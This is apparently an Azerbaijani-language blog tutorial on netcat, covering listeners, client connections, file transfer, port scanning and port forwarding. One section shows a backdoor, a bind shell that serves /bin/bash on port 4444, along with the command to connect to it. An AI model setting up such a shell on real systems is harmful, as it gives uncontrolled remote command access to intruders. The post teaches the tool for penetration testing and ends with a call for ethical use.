Netcat nədir?

admin
Pentest alətləri

Netcat Haqqında Ətraflı Texniki Məlumat

Netcat (nc) — şəbəkə bağlantıları yaratmaq və idarə etmək üçün istifadə edilən güclü bir komanda xətti alətidir. “Netcat” adətən “network cat” olaraq izah edilir, çünki bu alət, Linux və Unix əməliyyat sistemlərində faylları, məlumatları və bağlantıları şəbəkə üzərindən “təkrarlamaq” (pipe) və “tutmaq” funksiyasını yerinə yetirir. Netcat həm TCP, həm də UDP protokollarını dəstəkləyir və bu səbəbdən çox çevik və geniş istifadə olunan bir alət halına gəlir.

Netcat, pentest (penetrasiya testləri), şəbəkə administratorları tərəfindən şəbəkə problemlərinin diaqnostikasıəsas şəbəkə xidmətləri üçün istifadə olunur. Bu, həmçinin backdoor (geri qapı) yaradıcılığı, məlumatın ötürülməsi, şəbəkə portlarını yoxlamaq və əlaqə idarə etmək üçün faydalı bir alət ola bilər.

Netcat-ın Əsas Xüsusiyyətləri

Netcat, şəbəkə üzərində müxtəlif əməliyyatları həyata keçirmək üçün çox sayda xüsusiyyətə malikdir. Əsas xüsusiyyətlərdən bəziləri:

  1. Bağlantı Qurma və Qəbul Etmə: Netcat, həm serverə qoşulma (client), həm də server kimi işləmə qabiliyyətinə malikdir. Bu, şəbəkə üzərindəki TCP/UDP bağlantılarını idarə etməyə imkan verir.
  2. Port Skanning (Port Yoxlama): Netcat, müəyyən bir hostda açıq olan portları tapmaq üçün istifadə edilə bilər. Bu, şəbəkə üzərində zəifliklərin aşkar edilməsi üçün faydalıdır.
  3. Şəbəkə Trafikini Yönləndirmək: Netcat, şəbəkə üzərindən məlumatın yönləndirilməsi və idarə edilməsini təmin edir. Bu, məlumatların bir cihazdan digərinə yönləndirilməsi üçün istifadə edilə bilər.
  4. Fayl Transferi: Netcat, faylların şəbəkə üzərindən sürətli şəkildə göndərilməsi və alınması üçün istifadə edilə bilər. Bu xüsusiyyət, şəbəkə mütəxəssisləri və administratorları üçün faydalıdır.
  5. Şəbəkə Dinləyicisi və Serveri: Netcat, şəbəkə portlarında dinləmə və server kimi fəaliyyət göstərmək üçün istifadə edilə bilər. Bu, müxtəlif xidmətlər yaratmaq və sızma testləri üçün faydalıdır.
  6. Backdoor Qurma: Netcat, sızma testləri zamanı geri qapı (backdoor) yaratmaq üçün istifadə olunur. Bu, xüsusi şəbəkə əlaqələrinin yaradılmasına və uzaqdan nəzarətə imkan verir.

Netcat-ın İstifadəsi

Netcat, çox çevik və güclü bir alət olduğu üçün bir çox fərqli məqsədlə istifadə edilə bilər. Aşağıda ən çox istifadə olunan bəzi nümunələri təqdim edirik.

1. Server Qurmaq (Dinləyici Porta Bağlanmaq)

Netcat ilə sadə bir TCP serveri qurmaq çox asandır. Məsələn, aşağıdakı əmrlə port 12345-də dinləyici (listener) bir server yaratmaq mümkündür:

nc -l -p 12345

Bu əmrlə, nc 12345 portunu dinləyəcək və əlaqə qurulmuş hər hansı bir məlumatı qəbul edəcək.

2. Client Kimi Bağlanmaq

Netcat, müəyyən bir serverə qoşulmaq üçün də istifadə edilə bilər. Məsələn, bir IP adresinə və portuna qoşulmaq üçün:

nc 192.168.1.10 12345

Bu əmr, 192.168.1.10 IP ünvanında 12345 portuna TCP əlaqəsi quracaq.

3. Fayl Göndərmək

Netcat, fayl transferi üçün çox asan bir üsul təqdim edir. Bir serverə fayl göndərmək üçün, server tərəfi dinləməyə başlamalıdır:

Server tərəfində:

nc -l -p 12345 > received_file.txt

Client tərəfində faylı göndərmək üçün isə:

nc 192.168.1.10 12345 < file_to_send.txt

Bu əmrlə file_to_send.txt faylı 192.168.1.10 serverinə 12345 portu üzərindən göndərilir.

4. Port Skanning (Port Yoxlama)

Netcat, müəyyən bir IP ünvanında açıq portları tapmaq üçün istifadə edilə bilər. Aşağıdakı əmr, 192.168.1.10 ünvanında 1-1000 arası portları yoxlayacaq:

nc -zv 192.168.1.10 1-1000

Bu əmrdə -z (zero-I/O mode) parametri portları yalnız yoxlayır, məlumat göndərmir, -v isə çıxışı daha detallı edir.

5. Şəbəkə Yönləndirməsi (Port Forwarding)

Netcat, şəbəkə trafikini bir portdan digərinə yönləndirmək üçün istifadə edilə bilər. Məsələn, lokal bir portu uzaq bir serverə yönləndirmək üçün:

nc -l -p 12345 | nc 192.168.1.20 54321

Bu əmrlə, 12345 portuna gələn məlumatlar 192.168.1.20 IP ünvanında 54321 portuna göndəriləcək.

6. Backdoor Qurmaq

Netcat, sızma testləri zamanı bir serverə geri qapı açmaq üçün istifadə edilə bilər. Məsələn, bir sistemə geri qapı qurmaq üçün aşağıdakı əmrdən istifadə olunur:

Server tərəfində:

nc -l -p 4444 -e /bin/bash

Bu əmrlə, 4444 portunda dinləyici bir Netcat serveri yaradılır və əlaqə qurulduqda, bash shell-ə keçid edilir. Bu, uzaqdan sistemə daxil olmaq və komanda işlətmək üçün istifadə edilir.

Client tərəfində:

nc 192.168.1.10 4444

Bu əmrlə client, 192.168.1.10 serverinə qoşulacaq və bash shell-ə giriş əldə edəcək.

Netcat Komut Parametrləri

Netcat-ın əsas parametrləri aşağıdakılardır:

  • -l: Dinləmə rejiminə keçmək (server kimi işləmək).
  • -p <port>: Dinləmə üçün port nömrəsini təyin etmək.
  • -v: Detallı çıxış göstərmək.
  • -z: Port skan edərkən yalnız portların açıq olub olmadığını yoxlamaq.
  • -e <program>: Bağlantı qurulduqda müəyyən bir proqramı işlətmək (backdoor yaratmaq).
  • -n: DNS çözümlemesi etmədən yalnız IP istifadə etmək.
  • -u: UDP protokolunu istifadə etmək.
  • -w <seconds>: Bağlantı üçün zaman aşımını təyin etmək.

Netcat-ın Təhlükəsizlik Təhlili və Zəifliklər

Netcat, çox güclü bir alət olsa da, təhlükəsizlik mütəxəssisləri tərəfindən penetrasiya testlərişəbəkə zəifliklərinin aşkar edilməsi üçün geniş istifadə olunur. Lakin, Netcat çox çevik olduğu üçün həmçinin zərərli istifadəçilər tərəfindən şəbəkə sızmalarına və backdoor qurulmasına imkan verir. Bu səbəbdən, şəbəkə mütəxəssisləri və administratorları Netcat ilə yaranan təhlükələri izləməli və şəbəkə üzərində ciddi monitorinq aparmalıdırlar.

Netcat, güclü şəbəkə alətlərindən biri olsa da, doğru və etik istifadə məqsədi ilə istifadə olunmalıdır.

Related Posts

Bir cavab yazın

Sizin e-poçt ünvanınız dərc edilməyəcəkdir. Gərəkli sahələr * ilə işarələnmişdir